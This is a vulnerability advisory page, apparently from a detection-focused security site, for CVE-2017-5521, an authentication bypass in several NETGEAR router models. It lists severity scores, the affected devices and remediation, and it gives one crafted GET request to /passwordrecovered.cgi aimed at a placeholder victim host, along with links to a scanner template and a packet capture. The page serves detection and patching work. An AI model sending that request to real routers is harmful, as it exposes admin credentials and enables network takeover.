🔙 목록으로 돌아가기

CVE-2017-5521: NETGEAR Routers - Authentication Bypass

TitleNETGEAR Routers - Authentication Bypass
Authorprincechaddha
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.
RemediationApply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
CVSS Score8.1
EPSS Score0.93804
CVE IDCVE-2017-5521
CWE IDCWE-200
Tags cve cve2017 auth-bypass netgear router kev vkev vuln

🔍 Vulnerability Description

NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.

🌐 HTTP Request

GET /passwordrecovered.cgi?id=mygg6 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-5521.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-5521.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A